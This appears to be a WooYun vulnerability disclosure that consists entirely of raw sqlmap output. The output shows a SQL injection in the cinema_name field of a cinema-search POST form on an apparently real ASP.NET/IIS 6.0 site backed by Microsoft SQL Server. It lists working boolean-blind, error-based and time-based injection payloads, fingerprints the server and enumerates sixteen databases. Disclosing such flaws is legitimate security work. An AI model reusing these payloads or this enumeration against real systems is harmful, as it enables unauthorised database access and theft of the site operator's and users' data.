WooYun.org

sqlmap identified the following injection points with a total of 52 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cinema_name=%' AND 1377=1377 AND '%'='&cinema_address=&city=&m_time1=&m_time2=& %B2%E9%D5%D2 = %B2%E9%D5%D2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: cinema_name=%' AND 6832=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(111)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6832=6832) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(116)+CHAR(98)+CHAR(113))) AND '%'='&cinema_address=&city=&m_time1=&m_time2=& %B2%E9%D5%D2 = %B2%E9%D5%D2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: cinema_name=%' AND 2086=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&cinema_address=&city=&m_time1=&m_time2=& %B2%E9%D5%D2 = %B2%E9%D5%D2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server Unknown
available databases [16]:
[*] bill
[*] eptel
[*] ims
[*] info
[*] master
[*] model
[*] ngsp
[*] ocs
[*] openeap4
[*] openeapwb
[*] petra
[*] petra_bak
[*] q_bar
[*] report
[*] sanya12345
[*] tempdb